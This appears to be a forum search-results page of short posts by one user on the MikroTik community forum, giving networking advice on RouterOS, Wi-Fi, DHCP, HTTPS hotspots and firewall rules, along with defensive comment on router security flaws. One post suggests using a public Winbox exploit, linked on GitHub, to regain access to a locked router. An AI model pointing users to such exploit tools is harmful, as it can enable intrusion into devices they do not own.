Community discussions

Search found 883 matches

by R1CH
Mon Apr 01, 2019 2:33 pm
Forum: General
Topic: ros rb4011 2.4g can't be connected by 4 devices?
Replies: 6
Views: 443

Re: ros rb4011 2.4g can't be connected by 4 devices?

With 20 virtual APs you are probably destroying the channel with beacons. Make sure to set g/n only or change your data rates.

https://r1ch.net/blog/wifi-beacon-pollution
by R1CH
Sat Mar 30, 2019 3:37 pm
Forum: General
Topic: Block DropBox with firewall
Replies: 2
Views: 442

Re: Block DropBox with firewall

As it's HTTPS you need to block via DNS or IP range, not recommended. If bandwidth consumption is a concern then use queues or data limits for your users.
by R1CH
Sat Mar 30, 2019 3:28 pm
Forum: General
Topic: how to close all UDP ports on mikrotik?
Replies: 3
Views: 464

Re: how to close all UDP ports on mikrotik?

Add rule to FORWARD chain, protocol UDP, action DROP. Note that this will break a lot of things that rely on UDP, a better solution is to fix whichever client behind your router is infected and trying to scan the internet.
by R1CH
Fri Mar 29, 2019 2:07 am
Forum: General
Topic: Running IPv6 on Mikrotik? You're out of business in 12 days time
Replies: 32
Views: 15170

Re: Running IPv6 on Mikrotik? You're out of business in 12 days time

why r u being so disruptive and trying to break mikrotik? That's what security researchers do. Any internet connected device and protocol is studied for such bugs, and finding and fixing them makes everyone safer. Be happy that he found it before the bad guys did. Imagine someone constantly crashin...
by R1CH
Thu Mar 28, 2019 2:24 pm
Forum: General
Topic: Running IPv6 on Mikrotik? You're out of business in 12 days time
Replies: 32
Views: 15170

Re: Running IPv6 on Mikrotik? You're out of business in 12 days time

Somehow this is the first I've heard of this and I'm very concerned as I have a modern network that includes IPv6. You're saying Mikrotik have known about this for 50 weeks and it hasn't been fixed?!? What is going on over there?! This is a completely unacceptable response for a security vulnerabili...
by R1CH
Tue Mar 26, 2019 5:32 pm
Forum: General
Topic: wAP AC reaching out to 159.148.172.226:80 every hour
Replies: 10
Views: 706

Re: wAP AC reaching out to 159.148.172.226:80 every hour

First thing I checked, definitely disabled.
by R1CH
Tue Mar 26, 2019 2:39 pm
Forum: General
Topic: Question about SSL certificate
Replies: 3
Views: 381

Re: Question about SSL certificate

by R1CH
Tue Mar 26, 2019 2:35 pm
Forum: General
Topic: wAP AC reaching out to 159.148.172.226:80 every hour
Replies: 10
Views: 706

Re: wAP AC reaching out to 159.148.172.226:80 every hour

The log screenshot is from my core router, the AP has forwarding disabled since it bridges onto the appropriate VLANs so it can't be coming from a client.
by R1CH
Tue Mar 26, 2019 1:51 pm
Forum: General
Topic: wAP AC reaching out to 159.148.172.226:80 every hour
Replies: 10
Views: 706

Re: wAP AC reaching out to 159.148.172.226:80 every hour

Why would it be doing this by itself? I have no auto upgrade configured, no one is logged in and running check-for-updates. None of the other devices with the same config are doing this.
by R1CH
Tue Mar 26, 2019 1:52 am
Forum: General
Topic: lost password after exploit
Replies: 3
Views: 370

Re: lost password after exploit

If it isn't blocked just use the same exploit to gain access. https://github.com/BigNerd95/WinboxExploit
by R1CH
Tue Mar 26, 2019 1:51 am
Forum: General
Topic: Local devices on DHCP are in DNS cache as 0.0.0.0
Replies: 2
Views: 230

Re: Local devices on DHCP are in DNS cache as 0.0.0.0

DHCP does not register DNS. You need to script this if you want it.

https://wiki.mikrotik.com/wiki/Setting_ ... DHCP_lease
by R1CH
Tue Mar 26, 2019 1:50 am
Forum: General
Topic: wAP AC reaching out to 159.148.172.226:80 every hour
Replies: 10
Views: 706

Re: wAP AC reaching out to 159.148.172.226:80 every hour

Nope. Very basic config, bridged wlans, some virtual APs, no CAPSMAN. Can't think what else would be causing it.
by R1CH
Mon Mar 25, 2019 6:01 pm
Forum: General
Topic: wAP AC reaching out to 159.148.172.226:80 every hour
Replies: 10
Views: 706

wAP AC reaching out to 159.148.172.226:80 every hour

Trying to figure why this is happening as of 6.44, also tried 6.44.1. I upgraded all my wAP AC units (5), however only one of them is displaying this behavior. https://i.imgur.com/pE3W2M2.png DDNS is disabled, Update Time is disabled, TZ auto detect is disabled. No scripts, scheduler, etc. What else...
by R1CH
Mon Mar 25, 2019 4:18 pm
Forum: General
Topic: dns cache problam
Replies: 2
Views: 224

Re: dns cache problam

Those are negative entries, the random names are normal and used by captive portal detection of various OSes. Nothing in that should affect WhatsApp, the problem may be elsewhere.
by R1CH
Sat Mar 23, 2019 8:01 pm
Forum: Wireless Networking
Topic: Multiple SSID’s and DHCP [SOLVED]
Replies: 3
Views: 345

Re: Multiple SSID’s and DHCP [SOLVED]

Bridge should be fine, just make sure DHCP server is set up to run on the bridge instead of one of the interfaces.
by R1CH
Fri Mar 22, 2019 5:31 pm
Forum: General
Topic: Help to config roming wireless
Replies: 4
Views: 377

Re: Help to config roming wireless

The best thing you can do with Mikrotik is setup all APs with same SSID / authentication, ensure they're all in the same broadcast domain and ensure your DHCP server is very fast at handling requests / renews (eg no pinging for 2 seconds before giving a lease). Unfortunately RouterOS lacks support f...
by R1CH
Fri Mar 22, 2019 1:33 pm
Forum: Wireless Networking
Topic: 256QAM and AC provisioning on 2,4GHz
Replies: 2
Views: 379

Re: 256QAM and AC provisioning on 2,4GHz

Sounds like you're asking for 802.11ax...
by R1CH
Fri Mar 22, 2019 12:17 pm
Forum: General
Topic: Question about SSL certificate
Replies: 3
Views: 381

Re: Question about SSL certificate

Yes, the hotspot FQDN must match the certificate. Do note that this only provides security to the hotspot page itself, it will not help in redirecting HTTPS pages to the hotspot.
by R1CH
Thu Mar 21, 2019 6:35 pm
Forum: General
Topic: Feature Request: Separate the firmware(bootloader) and routeros version number
Replies: 8
Views: 496

Re: Feature Request: Separate the firmware(bootloader) and routeros version number

You always need to update RouterBOOT and keep it the same version as RouterOS The problem is Routerboot often has no changes between RouterOS versions, but we have no way of knowing since the version is incremented regardless. This involves needless reboots and additional wear on the small flash re...
by R1CH
Wed Mar 20, 2019 9:36 pm
Forum: RouterBOARD hardware
Topic: hAP ac and Verizon Gigabit
Replies: 4
Views: 393

Re: hAP ac and Verizon Gigabit

Make sure fasttrack is active, hAP AC is unlikely to be able to do 1gbps otherwise.
by R1CH
Tue Mar 19, 2019 1:26 pm
Forum: General
Topic: HOTSPOT login https error
Replies: 11
Views: 804

Re: HOTSPOT login https error

You don't start, since that is impossible. The security of HTTPS negates attempts to intercept such requests, unless you want to teach your users to blindly ignore serious security errors.
by R1CH
Tue Mar 19, 2019 1:24 pm
Forum: General
Topic: CPU consumption by Horizon?
Replies: 2
Views: 498

Re: CPU consumption by Horizon?

Horizon will disable hardware offload according to wiki.
by R1CH
Mon Mar 18, 2019 4:22 pm
Forum: General
Topic: Putty updated to 0.71
Replies: 12
Views: 675

Re: Putty updated to 0.71

Which is my point. Post it in the phucking putty forum. Do you want me to start effing posting everytime there is a windows update, a linux update, a macos update, an avast update, etc etc etc............ I might as well post everytime I pop a zit, and pluck a nose hair. ;-) It's been almost two ye...
by R1CH
Mon Mar 18, 2019 1:51 am
Forum: Wireless Networking
Topic: blog.mikrotik.com: 802.11ay?
Replies: 3
Views: 504

Re: blog.mikrotik.com: 802.11ay?

Right after 802.11ax...
by R1CH
Mon Mar 18, 2019 1:49 am
Forum: Announcements
Topic: v6.44.1 [stable] is released!
Replies: 86
Views: 18022

Re: v6.44.1 [stable] is released!

Do you really need all those packages? You are likely out of space since the device only has 16MB flash.
by R1CH
Sun Mar 17, 2019 11:54 pm
Forum: General
Topic: Redirect All SSL Pages to one page
Replies: 4
Views: 298

Re: Redirect All SSL Pages to one page

Don't set up your network in a way that intercepts all HTTPS requests and encourages users to bypass SSL errors. This is teaching users very dangerous practices, when their connection actually does get MITMed by a network attacker or compromised DNS, website, etc, then they will happily ignore the e...
by R1CH
Fri Mar 15, 2019 6:52 pm
Forum: General
Topic: Redirect All SSL Pages to one page
Replies: 4
Views: 298

Re: Redirect All SSL Pages to one page

Not possible, HTTPS is secure so you can't intercept it.
by R1CH
Fri Mar 15, 2019 6:51 pm
Forum: Announcements
Topic: v6.44.1 [stable] is released!
Replies: 86
Views: 18022

Re: v6.44.1 [stable] is released!

I didn't see any difference in behavior, it behaves as if it's disabled regardless of the checkbox state.
by R1CH
Fri Mar 15, 2019 3:56 pm
Forum: Announcements
Topic: v6.44.1 [stable] is released!
Replies: 86
Views: 18022

Re: v6.44.1 [stable] is released!

This doesn't affect users only during an upgrade, the default RouterOS conntrack timeouts are quite low and especially with the bug with tcp unacked timer, it's easy to get day-to-day TCP connections affected by this.
by R1CH
Fri Mar 15, 2019 3:42 pm
Forum: Announcements
Topic: v6.44.1 [stable] is released!
Replies: 86
Views: 18022

Re: v6.44.1 [stable] is released!

I can confirm the "Loose TCP Tracking" is completely broken in this release (and perhaps 6.44, didn't test it extensively). Previously established connections are treated as INVALID regardless of the setting.
by R1CH
Fri Mar 15, 2019 3:27 pm
Forum: General
Topic: HOTSPOT login https error
Replies: 11
Views: 804

Re: HOTSPOT login https error

Just make sure nothing is in the walled garden. As long as the user is using a modern browser or phone, they should get the prompt for the portal.
by R1CH
Thu Mar 14, 2019 9:11 pm
Forum: General
Topic: HOTSPOT login https error
Replies: 11
Views: 804

Re: HOTSPOT login https error

Make sure that you aren't allowing any sites in the hotspot before user auth, if you allow connectivity to Google / Apple / etc, the browser will think it has internet and will not trigger the captive portal. Any modern browser otherwise will notice the connection test is failing and prompt the user...
by R1CH
Tue Mar 12, 2019 7:52 pm
Forum: General
Topic: Connection tracking issue
Replies: 2
Views: 347

Re: Connection tracking issue

If you're seeing untranslated packets make it onto the network then you must have modified the default config, as this is considered "invalid" by netfilter and the defconf rules drop it.
by R1CH
Sun Mar 10, 2019 7:47 pm
Forum: General
Topic: Is there any way to do HTTP and HTTPS traffic shaping based on categories?
Replies: 10
Views: 452

Re: Is there any way to do HTTP and HTTPS traffic shaping based on categories?

You can use the tls host rule which works with SNI.
by R1CH
Sat Mar 09, 2019 2:48 pm
Forum: RouterBOARD hardware
Topic: MUM Europe 2019: new hardware
Replies: 61
Views: 11217

Re: MUM Europe 2019: new hardware

Wish there was some announcements about 802.11ax. I guess until ROS v7 is released the kernel is too old to support such drivers anyway.
by R1CH
Fri Mar 08, 2019 5:14 pm
Forum: General
Topic: hEX S shows activity on disabled SFP port without a link
Replies: 6
Views: 324

Re: hEX S shows activity on disabled SFP port without a link

I enabled the interface and the problem stopped. Very weird behavior. I don't plan on using the SFP port so this doesn't seem to cause any issues.
by R1CH
Thu Mar 07, 2019 7:44 pm
Forum: General
Topic: hEX S shows activity on disabled SFP port without a link
Replies: 6
Views: 324

Re: hEX S shows activity on disabled SFP port without a link

This is occurring with 6.44.
by R1CH
Thu Mar 07, 2019 6:26 pm
Forum: General
Topic: hEX S shows activity on disabled SFP port without a link
Replies: 6
Views: 324

hEX S shows activity on disabled SFP port without a link

How is this even possible?!

Image

ether2-5 and sfp1 are bridged. The traffic levels seems to match around what ether2 is doing.
by R1CH
Tue Mar 05, 2019 6:12 pm
Forum: General
Topic: Cant resolve mynetname.net when DNSSEC validation is enabled
Replies: 2
Views: 272

Re: Cant resolve mynetname.net when DNSSEC validation is enabled

Seems to work OK here behind a DNSSEC-validating PowerDNS recursor.

No TCP support though is a problem that Mikrotik need to fix.
by R1CH
Sat Mar 02, 2019 3:04 am
Forum: Announcements
Topic: v6.44 [stable] is released!
Replies: 219
Views: 35274

Re: v6.44 [stable] is released!

https-redirect is not working You can't redirect HTTPS - the security provided by HTTPS means that unless you control the client devices and can install custom root certs, certificate validation will fail and users will see security errors. Mikrotik of all people should know this... what does this ...
by R1CH
Wed Feb 27, 2019 4:22 pm
Forum: General
Topic: RouterOS and 161/udp
Replies: 1
Views: 353

Re: RouterOS and 161/udp

You aren't filtering any other UDP ports, so they are responded to with an ICMP port unreachable, confirming the port is closed. Since UDP is connectionless, unless you speak the protocol there's no way to distinguish between an open port and a filtered port. I recommend you update your firewall to ...
by R1CH
Fri Feb 22, 2019 9:23 pm
Forum: General
Topic: Security issue when Winbox exposed
Replies: 68
Views: 5641

Re: Security issue when Winbox exposed

Unicode in the updated changelog, which winbox can't handle.

Image
by R1CH
Fri Feb 22, 2019 3:25 pm
Forum: General
Topic: Security issue when Winbox exposed
Replies: 68
Views: 5641

Re: Security issue when Winbox exposed

I think it's great that Zerodium started a bug bounty program for Mikrotik. It's not like the bad guys don't know, they're just providing incentives for full disclosure. So patch early and patch often my friends! Unfortunately that isn't how it works. Zerodium will pay for Mikrotik exploits and the...
by R1CH
Fri Feb 22, 2019 1:27 am
Forum: Announcements
Topic: v6.43.12 [stable] is released!
Replies: 49
Views: 11964

Re: v6.43.12 [stable] is released!

My CCR1009-7G-1C-1S+ just watchdog timer rebooted after installing this update a few days ago. In over a year of operation never had that happen.
Feb/21/2019 14:46:44 system,error,critical router was rebooted without proper shutdown by watchdog timer
by R1CH
Fri Feb 22, 2019 1:06 am
Forum: General
Topic: Security issue when Winbox exposed
Replies: 68
Views: 5641

Re: Security issue when Winbox exposed

I see where you are coming from, so I fixed it for ya................. Please try to keep in mind some of us run networks where we can't just take down the router for every RouterOS release. This was clearly not labelled as a security fix, so I personally did not consider it a priority to deploy du...
by R1CH
Thu Feb 21, 2019 6:52 pm
Forum: General
Topic: Security issue when Winbox exposed
Replies: 68
Views: 5641

Re: Security issue when Winbox exposed

Why is this not mentioned as high severity security bug in changelog? Why no mention on security blog? Come on Mikrotik...
by R1CH
Wed Feb 20, 2019 11:56 pm
Forum: General
Topic: Problem with AP RBWAP2ND-BE
Replies: 2
Views: 234

Re: Problem with AP RBWAP2ND-BE

Try a full config reset with the reset button or just netinstall them. The default config on these devices is infuriating!

https://wiki.mikrotik.com/wiki/Manual:Reset_button
by R1CH
Wed Feb 20, 2019 11:44 pm
Forum: Wireless Networking
Topic: Superchannel on ac radios?
Replies: 4
Views: 518

Re: Superchannel on ac radios?

You need the international version if you want unlocked frequencies. - RB921UAGS-5SHPacT-NM-US (USA) is factory locked for 5170-5250MHz and 5725-5835MHz frequencies. This lock can not be removed. - RB921UAGS-5SHPacT-NM (International) supports 5150MHz-5875MHz range (Specific frequency range can be l...
by R1CH
Wed Feb 20, 2019 4:39 pm
Forum: General
Topic: Problem with DHCP Mikrotik RB962UIGS-5HACT2HNT
Replies: 11
Views: 584

Re: Problem with DHCP Mikrotik RB962UIGS-5HACT2HNT

Config? Maybe you're blocking important DHCP packets with the firewall.
by R1CH
Mon Feb 18, 2019 1:00 pm
Forum: General
Topic: WireGuard Released !
Replies: 9
Views: 3419

Re: WireGuard Released !

Just because it isn't mainlined doesn't mean it isn't available. I've been using it in production for months via DKMS and I'm very happy with it. There are open source Windows clients available, performance is great and setup is so refreshingly easy compared to something like IPSec. And it's actuall...
by R1CH
Fri Feb 15, 2019 6:16 pm
Forum: Announcements
Topic: v6.44rc [testing] is released!
Replies: 67
Views: 12098

Re: v6.44rc [testing] is released!

You make a good point about reboots creating zombie TCP connections on the nodes, but you are wrong about the DoS mitigation. Setting nf_conntrack_tcp_loose to 0 (not the default) stops false SYN-ACK and ACK packets before they hit the “listen” state lock, thereby allowing conntrack to scale much h...
by R1CH
Fri Feb 15, 2019 5:57 pm
Forum: Announcements
Topic: v6.44rc [testing] is released!
Replies: 67
Views: 12098

Re: v6.44rc [testing] is released!

That setting should have no effect on DoS resistance unless you aren't properly filtering your inbound traffic. It's set to 1 which is the default, for good reason, otherwise any time a router reboots every single active TCP connection would have to time out instead of continuing to work.
by R1CH
Fri Feb 15, 2019 4:21 pm
Forum: Announcements
Topic: v6.44rc [testing] is released!
Replies: 67
Views: 12098

Re: v6.44rc [testing] is released!

Just to clarify, *) wireless - improved system stability for all ARM devices with wireless; *) wireless - improved system stability for all MIPSBE devices with 802.11ac wireless; Does this improve wireless performance or only RouterOS software stability? Also what devices are using AR5212? This is a...
by R1CH
Thu Feb 14, 2019 7:18 pm
Forum: Wireless Networking
Topic: Help Hacker sending deauth packet
Replies: 6
Views: 743

Re: Help Hacker sending deauth packet

These are often accidental, where someone configures an enterprise AP with "rogue AP mitigation" or a similar setting. Check with any businesses nearby or see if a wireless scan picks out any obvious enterprise APs that might be the culprits.
by R1CH
Thu Feb 14, 2019 1:05 pm
Forum: RouterBOARD hardware
Topic: Why people pair UBNT APs with MikroTik routers?
Replies: 55
Views: 29204

Re: Why people pair UBNT APs with MikroTik routers?

Do all people asking for new kernel realize that it would mean dropping support for WHOLE current CCR series since Linux kernel officially dropped support for Tile-Gx CPUs architecture? While I'm not saying Tile-Gx is awesome it'd still mean dropping support for devices that are: 1) still being sol...
by R1CH
Wed Feb 13, 2019 12:58 pm
Forum: Wireless Networking
Topic: cAP ac (Found the bug)
Replies: 1
Views: 404

Re: cAP ac (Found the bug)

Best to create supout and send to support@mikrotik.com.
by R1CH
Wed Feb 13, 2019 12:51 pm
Forum: General
Topic: $100,000 bounty for Mikrotik 0-days
Replies: 1
Views: 599

$100,000 bounty for Mikrotik 0-days

Thought this was interesting... given the number of exploits already found, I have no doubts that this kind of bounty will turn up more that will be sold to governments and criminals and used against Mikrotik networks. Unless there's an unpatched kernel bug, the safest way to protect yourself from u...
by R1CH
Wed Feb 13, 2019 12:41 pm
Forum: General
Topic: Feature request - DNSCrypt support...
Replies: 153
Views: 43744

Re: Feature request - DNSCrypt support...

Instead of wordless pluses, how about a discussion on TLS vs HTTPS. TLS gives you a specific port and capability to filter and NAT etc. HTTPS gives you more security, but also the inability to catch this traffic as an administrator. More aspects? Why not both? Although DNS over HTTPS seems to be th...
by R1CH
Tue Feb 12, 2019 1:24 pm
Forum: General
Topic: Config Review - Security Conscience Home User
Replies: 19
Views: 1210

Re: Config Review - Security Conscience Home User

I would ditch all the blacklist / port scan detect / etc stuff. This kind of thing just opens you up to a resource exhaustion attack and can even result in blacklisting legitimate traffic if an attacker has IP spoofing capabilities. The CPUs on these devices are not powerful enough to this kind of s...
by R1CH
Mon Feb 11, 2019 8:21 pm
Forum: Announcements
Topic: v6.43.12 [stable] is released!
Replies: 49
Views: 11964

Re: v6.43.12 [stable] is released!

*) winbox - improvements in connection handling to router with open winbox service;
Yet another security hole, I presume?
How severe is it?
Sounds like you can DoS the service with half-closed connections or something.
by R1CH
Mon Feb 11, 2019 1:05 pm
Forum: General
Topic: ROS v6.43.x Hacked using same old vulnerability
Replies: 2
Views: 765

Re: ROS v6.43.x Hacked using same old vulnerability

Netinstall the latest version with known clean config and change all passwords. Either you didn't change passwords or you didn't netinstall, so attackers were able to get back onto your device.
by R1CH
Sun Feb 10, 2019 5:08 pm
Forum: General
Topic: problem to block Pubg Game
Replies: 6
Views: 2650

Re: problem to block Pubg Game

Here are the IP ranges used by PUBG. I would not recommend blocking it.

http://ec2-reachability.amazonaws.com/
by R1CH
Fri Feb 08, 2019 12:41 pm
Forum: General
Topic: Bandwidth Test maximum speed
Replies: 4
Views: 599

Re: Bandwidth Test maximum speed

Test through the routers using iperf3, not on the routers.
by R1CH
Thu Feb 07, 2019 11:32 pm
Forum: RouterBOARD hardware
Topic: New routerboot firmware
Replies: 12
Views: 1504

Re: New routerboot firmware

Note that although the firmware version is in sync with the RouterOS version, there are often no changes between versions. It's only worth upgrading if there's a change you need.
by R1CH
Thu Feb 07, 2019 10:22 pm
Forum: General
Topic: Using RouterOS as a local DNS server?
Replies: 3
Views: 404

Re: Using RouterOS as a local DNS server?

Oh my mistake, I misread this question.
by R1CH
Thu Feb 07, 2019 7:29 pm
Forum: General
Topic: Tunnel which generates least traffic when IDLE
Replies: 13
Views: 1101

Re: Tunnel which generates least traffic when IDLE

Wireguard is absolutely silent when there's no traffic and supports changing of endpoint IPs with no connectivity interruption. If you can go a non-Mikrotik route, I've had great success running Wireguard behind the router on a Linux box.
by R1CH
Thu Feb 07, 2019 6:28 pm
Forum: General
Topic: Using RouterOS as a local DNS server?
Replies: 3
Views: 404

Re: Using RouterOS as a local DNS server?

RouterOS doesn't do DHCP DNS registration. You can use a script to add and remove static entries if you need this.

viewtopic.php?t=119469
by R1CH
Thu Feb 07, 2019 5:37 pm
Forum: RouterBOARD hardware
Topic: RB4011iGS+RM Multi LAN
Replies: 3
Views: 547

Re: RB4011iGS+RM Multi LAN

Delete the default bridge and each port will act like its own LAN.
by R1CH
Thu Feb 07, 2019 4:55 pm
Forum: RouterBOARD hardware
Topic: Why people pair UBNT APs with MikroTik routers?
Replies: 55
Views: 29204

Re: Why people pair UBNT APs with MikroTik routers?

Where does this stand now in 2019 after an entire 2018?
I feel like there's been no real progress since the original hAP AC release. I'm still using wAP AC units when I need a small cheap AP and don't care about latency, but for any big deployment I'm going with UBNT / Ruckus depending on budget.
by R1CH
Thu Feb 07, 2019 4:20 pm
Forum: General
Topic: SMB issues
Replies: 4
Views: 558

Re: SMB issues

Wouldn't it make more sense to keep the modern protocol and disable SMB1 and SMB2? SMB1 is completely removed from Windows 10 these days because it's so old and insecure.
by R1CH
Tue Feb 05, 2019 11:32 pm
Forum: General
Topic: Detect-internet causing internal packet loss
Replies: 10
Views: 1548

Re: Packets being dropped from one host only

How is that a thing?!
by R1CH
Mon Feb 04, 2019 7:16 pm
Forum: Wireless Networking
Topic: 802.11ax [SOLVED]
Replies: 113
Views: 16171

Re: 802.11ax [SOLVED]

You can buy 802.11ax routers on the shelf in retail stores already, yet zero communication from Mikrotik about their timeline... this is rather worrying.
by R1CH
Mon Feb 04, 2019 7:05 pm
Forum: Wireless Networking
Topic: High ping to router HAP AC2
Replies: 33
Views: 2296

Re: High ping to router HAP AC2

This isn't too surprising, Mikrotik wifi is generally poor compared to the competition. Join me in waiting for RouterOS v7 when hopefully we aren't running on drivers and kernel from 2012.
by R1CH
Mon Feb 04, 2019 7:01 pm
Forum: Wireless Networking
Topic: wAP AC for medium densidty outdoor Wireless (Hotspot) project
Replies: 7
Views: 616

Re: wAP AC for medium densidty outdoor Wireless (Hotspot) project

As much as I like Mikrotik, I would avoid their wifi products for this, the features are years behind the competition due to outdated drivers and kernel. Depending on how soon you need to deploy, it might be worth waiting for 802.11ax outdoor products to hit the market. Ruckus might be worth looking...
by R1CH
Fri Feb 01, 2019 4:57 pm
Forum: General
Topic: High number of established connections for one address
Replies: 20
Views: 1298

Re: High number of established connections for one address

TCP session state is based on the endpoints, as long as you pass packets back and forth correctly the session will be fine, there's no state necessary on the router. If you actively break this process by introducing NAT then you should accept that it's your responsibility not to break things for the...
by R1CH
Fri Feb 01, 2019 2:13 pm
Forum: General
Topic: High number of established connections for one address
Replies: 20
Views: 1298

Re: High number of established connections for one address

TCP sessions should be able to last days without a router breaking them. I personally have many active SSH connections that sometimes remain idle for days until a log event is triggered or similar. I would hate to be a user of a network where such connections are broken after just 30 minutes. This o...
by R1CH
Mon Jan 28, 2019 6:27 pm
Forum: Wireless Networking
Topic: Art-Net / UDP port 6454 over WIFI
Replies: 9
Views: 605

Re: Art-Net / UDP port 6454 over WIFI

For broadcast traffic, look into the multicast buffering / helper and group key update interval. That said, Mikrotik generally has worse WiFi than Ubiquiti due to their outdated kernel / drivers. A modern off-the-shelf router might perform better.
by R1CH
Sun Jan 27, 2019 3:20 pm
Forum: General
Topic: Mikrotek RB750GR3 support DES?
Replies: 2
Views: 409

Re: Mikrotek RB750GR3 support DES?

Why do you want to use obsolete algorithms? Both DES and MD5 are proven insecure, you should not be using them anywhere in your network.
by R1CH
Fri Jan 25, 2019 1:06 am
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 6091

Re: 6.43.8 vulnerability or hack?

If you are talking about malware, then : "Simply upgrading RouterOS software deletes the malware, any other 3rd party files and closes the vulnerability" With old versions having root exploits then it's entirely possible for the malware to protect itself and persist after an upgrade. Any compromise...
by R1CH
Fri Jan 25, 2019 12:15 am
Forum: Wireless Networking
Topic: Turn down Tx power
Replies: 20
Views: 1206

Re: Turn down Tx power

1) If the APs are on different channels then they won't be affected by each other, but keep in mind there is always risk of overlap (especially prevalent in 2.4 GHz with only 3 non-overlapping channels). 2) Correct, N also has a 6mbps minimum so it makes no difference. 3) Not possible yet, I posted ...
by R1CH
Thu Jan 24, 2019 11:21 pm
Forum: Wireless Networking
Topic: Turn down Tx power
Replies: 20
Views: 1206

Re: Turn down Tx power

Beacons must be sent at the lowest speed the AP supports, with 802.11b this is 1mbps and a few APs nearby can take up a significant amount of channel bandwidth with just beacons. G/N only mitigates this significantly by mandating 6mbps minimum. I wrote about this in more detail on my blog, https://r...
by R1CH
Thu Jan 24, 2019 7:27 pm
Forum: General
Topic: New connection but not SYN
Replies: 8
Views: 519

Re: New connection but not SYN

This is normal "background traffic" - a client behind your router closed a connection to a server (FIN / RST) but the packet was lost in transit. The server has no idea the connection is closed, but because your router saw the outgoing FIN / RST, it removed the conntrack entry. So any packets coming...
by R1CH
Thu Jan 24, 2019 7:00 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 6091

Re: 6.43.8 vulnerability

You should setup VPN instead like PPTP, OVPN. etc.much safer This is just as unsafe (if not worse) as opening Winbox. PPTP, OpenVPN, IPsec etc are all custom Mikrotik implementations of protocols just like Winbox, except with much more complexity. I have no doubts serious security flaws exist in th...
by R1CH
Thu Jan 24, 2019 6:58 pm
Forum: General
Topic: Mikrotik Syn Cookies failed? [SOLVED]
Replies: 2
Views: 329

Re: Mikrotik Syn Cookies failed? [SOLVED]

SYN cookies do not do anything to protect against volumetric attacks, they are intended to protect a listening service from spoofed source IPs. Replace your SYN traffic with any other packet flood and you will likely see similar behavior assuming enough bandwidth between attacker and router. You can...
by R1CH
Mon Jan 14, 2019 10:57 pm
Forum: General
Topic: Tower Cabling Choice?
Replies: 4
Views: 442

Re: Tower Cabling Choice?

Shielding / UV resistance is probably more important for outdoor use. Ubiquiti have a product which looks good: https://www.ui.com/accessories/toughcable/
by R1CH
Sat Jan 12, 2019 9:05 pm
Forum: General
Topic: Drop Rules and Packet Count
Replies: 3
Views: 339

Re: Drop Rules and Packet Count

Yes, VLANs are considered their own interfaces and are filtered independently of the interface to which they're connected. You can filter by physical ports using the in / out bridge port options.
by R1CH
Fri Jan 11, 2019 4:18 pm
Forum: General
Topic: Mikrotik's demo system demo.mt.lv firewall Virus rules, worth using???
Replies: 7
Views: 873

Re: Mikrotik's demo system demo.mt.lv firewall Virus rules, worth using???

For forward chain it maybe makes a bit of sense to block new connections to these ports, however most of these are no longer active threats and you risk blocking legitimate services (eg cloud services that pick ephemeral ports). The only ones I use on my network are blocking leaky SMB (137-139,445) ...
by R1CH
Thu Jan 10, 2019 8:06 pm
Forum: RouterBOARD hardware
Topic: Higher-end PWR-Line AP
Replies: 1
Views: 401

Re: Higher-end PWR-Line AP

Would be indeed nice, the fact that the current devices only do 2.4 GHz is an immediate non-starter for me.
by R1CH
Wed Jan 09, 2019 2:45 pm
Forum: Announcements
Topic: v6.42.11 [long-term] is released!
Replies: 42
Views: 8704

Re: v6.42.11 [long-term] is released!

Tried to update to 6.42.11 from 6.42.9 on a hEX using "Download and install", then realized I needed to check something so hit Cancel at about 90% downloaded. I then tried "Download and install" later and it says "not enough disk space" and there's no files available to delete. How do I delete this...
by R1CH
Wed Jan 09, 2019 1:40 pm
Forum: Announcements
Topic: v6.42.11 [long-term] is released!
Replies: 42
Views: 8704

Re: v6.42.11 [long-term] is released!

Tried to update to 6.42.11 from 6.42.9 on a hEX using "Download and install", then realized I needed to check something so hit Cancel at about 90% downloaded. I then tried "Download and install" later and it says "not enough disk space" and there's no files available to delete. How do I delete this ...
by R1CH
Wed Jan 09, 2019 12:41 pm
Forum: Wireless Networking
Topic: High ping to router HAP AC2
Replies: 33
Views: 2296

Re: High ping to router HAP AC2

Make sure you're configuring / connecting to wlan2 (5 GHz), 2.4 GHz is too noisy for reliable connections.
by R1CH
Tue Jan 08, 2019 5:20 pm
Forum: General
Topic: firewall rules
Replies: 18
Views: 1427

Re: firewall rules

A default drop is generally much better than adding lots of other rules for port scans, address filters, weird TCP flags etc. On embedded devices like routerboards you have limited CPU time, having lots of filter rules running on each packet opens you up to a resource exhaustion DoS.
by R1CH
Mon Jan 07, 2019 3:55 pm
Forum: General
Topic: add it to wishlist - Multicore support for bandwidth test in ROS
Replies: 2
Views: 310

Re: add it to wishlist - Multicore support for bandwidth test in ROS

It's generally better to use iperf instead.
by R1CH
Thu Jan 03, 2019 2:20 pm
Forum: General
Topic: Open Facebook messenger from hotspot after login
Replies: 2
Views: 337

Re: Open Facebook messenger from hotspot after login

The iOS hotspot login page is presented in a modified browser window that for security reasons does not support redirecting to app protocol handlers. Perhaps try directing to a web based version of messenger, since you have no guarantees anyone even has it installed.
by R1CH
Thu Jan 03, 2019 2:07 pm
Forum: General
Topic: VLAN is to complicated
Replies: 21
Views: 1748

Re: VLAN is to complicated

I agree, VLAN support is very messy. It would be nice if when configuring a software VLAN that RouterOS would just enable hardware offloading like it does for a bridge. Having both hardware and software VLAN configurations mixed together gets very confusing.
by R1CH
Thu Jan 03, 2019 1:13 pm
Forum: General
Topic: Should MikroTik make more powerful antennas and wireless protocols in 2019?
Replies: 19
Views: 1468

Re: Should MikroTik make more powerful antennas and wireless protocols in 2019?

You know that we will not see new kernel on current RBs? Update actual RBs or make new ones with new kernel, better hardware and so on, what's the best choice for MK that is selling their products? Come on, it's not so different than smartphones. I don't see why not, there isn't that much hardware ...
by R1CH
Thu Jan 03, 2019 12:25 am
Forum: General
Topic: Hacked Board
Replies: 15
Views: 1491

Re: Hacked Board

Changing passwords is not enough, you MUST netinstall any compromised device!
by R1CH
Wed Jan 02, 2019 5:53 pm
Forum: General
Topic: Should MikroTik make more powerful antennas and wireless protocols in 2019?
Replies: 19
Views: 1468

Re: Should MikroTik make more powerful antennas and wireless protocols in 2019?

As other posters have said, new antennas and protocols don't mean anything when we're still forced to use a six year old kernel with a hacked-together wifi driver that barely supports any modern features. I want an up to date kernel and non-proprietary wifi drivers far more than I want new antennas ...
by R1CH
Wed Jan 02, 2019 5:49 pm
